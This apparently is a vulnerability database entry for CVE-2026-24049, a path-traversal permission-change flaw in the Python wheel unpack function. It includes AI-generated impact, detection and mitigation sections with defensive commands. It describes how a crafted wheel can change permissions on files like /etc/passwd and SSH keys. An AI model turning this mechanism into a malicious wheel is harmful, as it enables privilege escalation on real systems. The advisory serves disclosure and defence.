CVE-2026-24049
Unknown Unknown - Not Provided
File Permission Modification in Python wheel Unpack Enables Privilege Escalation

Publication date: 2026-01-22

Last updated on: 2026-02-18

Assigner: GitHub, Inc.

Description
wheel is a command line tool for manipulating Python wheel files, as defined in PEP 427. In versions 0.46.1 and below, the unpack function is vulnerable to file permission modification through mishandling of file permissions after extraction. The logic blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path. Attackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files), allowing for Privilege Escalation or arbitrary code execution by modifying now-writable scripts. This issue has been fixed in version 0.46.2.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-01-22
Last Modified
2026-02-18
Generated
2026-06-16
AI Q&A
2026-01-22
EPSS Evaluated
2026-06-15
NVD
CVE-2026-24049
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
wheel_project wheel From 0.40.0 (inc) to 0.46.2 (exc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-732 The product specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors.
CWE-22 The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2026-24049 is a vulnerability in the Python 'wheel' package's unpack function (versions 0.46.1 and below) where the code improperly applies file permissions after extracting files from a wheel archive. The unpack function blindly trusts filenames from the archive header, which can include path traversal sequences like '../'. This allows an attacker to craft a malicious wheel file that, when unpacked, changes the permissions of files outside the intended extraction directory, including critical system files. This can lead to unauthorized permission changes, enabling privilege escalation or arbitrary code execution. The issue was fixed in version 0.46.2 by applying permissions only to sanitized, extracted file paths. [1, 3]

Impact Analysis

This vulnerability can allow an attacker to modify the permissions of arbitrary files on your system outside the intended extraction directory when unpacking a malicious wheel file. For example, critical system files like /etc/passwd, SSH keys, or configuration files could be made world-writable. This can lead to privilege escalation or arbitrary code execution, compromising system integrity and security. [1, 3]

Detection Guidance

You can detect this vulnerability by checking if your system has wheel package versions 0.46.1 or below installed, as these versions contain the vulnerable unpack function. To verify the installed version, you can run the command: `pip show wheel` or `pip list | grep wheel`. Additionally, to detect if malicious wheel files with path traversal entries have been unpacked, you can audit file permissions on critical system files (e.g., /etc/passwd, SSH keys) for unexpected permission changes (e.g., world-writable permissions). For example, use `ls -l /etc/passwd` or `find /etc -perm /o+w` to find files with write permissions for others. Monitoring unpacking operations or scanning wheel files for path traversal entries (filenames containing '../') before unpacking can also help detect attempts to exploit this vulnerability. [3]

Mitigation Strategies

The immediate mitigation step is to upgrade the wheel package to version 0.46.2 or later, where the vulnerability has been fixed by ensuring that file permission changes are applied only to sanitized, extracted file paths within the intended directory. You can upgrade by running: `pip install --upgrade wheel`. Additionally, avoid unpacking wheel files from untrusted sources until the upgrade is applied. If you suspect exploitation, audit and restore permissions on critical system files that may have been altered. [2, 3]

Compliance Impact

This vulnerability allows attackers to modify permissions of critical system files, potentially leading to privilege escalation or arbitrary code execution. Such unauthorized access or modification of sensitive files could result in violations of security requirements mandated by standards like GDPR or HIPAA, which require protection of data integrity and confidentiality. Therefore, exploitation of this vulnerability could negatively impact compliance with these regulations by enabling unauthorized access or alteration of protected data or system configurations. [3]

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-24049. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart